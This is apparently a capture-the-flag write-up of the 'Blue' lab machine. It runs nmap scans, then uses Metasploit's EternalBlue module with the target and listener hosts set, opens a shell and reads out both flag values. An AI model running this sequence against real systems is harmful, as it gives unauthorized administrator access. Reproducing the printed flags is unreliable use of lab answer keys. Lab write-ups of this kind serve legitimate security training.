Blue

TARGET IP: 10.10.10.40
HOST IP: 10.10.16.10
RECON
NMAP
nmap [Target IP]

nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 [Target IP]

Looks like we have SMB open and some RPC open on other ports as well.
Based on the name alone, I'm highly suspicious that this thing is susceptible to eternal blue. I'm going to use an Nmap scan I found in a previous lab to check.
nmap -p 445 --script smb-protocols {TARGET IP]

Based on the fact that it allows for
SMBv1
and it is running Windows 7, I'm fairly confident that we could probably get Eternal Blue to run.
Exploit
Eternal Blue
msfconsole
search smb
use windows/smb/ms17_010_eternalblue
show options
Use the
set
command to set the different options.
set rhosts [Target IP]
set lhost [Host IP]

Now let's check to see if the host is vulnerable before moving forward.
check
Looks favorable. Let's exploit.
exploit
Let's start a command prompt shell and verify who we are.
shell
whoami
And now I have administrator privileges on the machine. Wow that was easy. Let's go grab the flags.
type C:\Users\haris\Desktop\user.txt

9ba10e548f8c18db7f90a5d1c5e2abc4
type C:\Users\Administrator\Desktop\root.txt

77a3bb72c76512c79b243e5235c38958
Conclusion
This was really easy and I had a feeling it was going to be really easy. Since I first saw the name of this machine and that it was a Windows machine, I already guessed it was going to be an eternal blue exploit.
I skipped a LOT of steps in the process that I normally would not have but since I already had a pretty good idea of where to go, I figured I would give that a try. Worst case scenario it doesn't work and I go back to my usual process of Recon and Enumeration to discover other methods.
Having done a coupe of other labs with Eternal Blue, I already knew how to exploit this machine so it was pretty quick. It's also scary to think how easy this tool is to use to immediately gain admin power in a system. Good job on creating an awesome tool NSA agents.
Last updated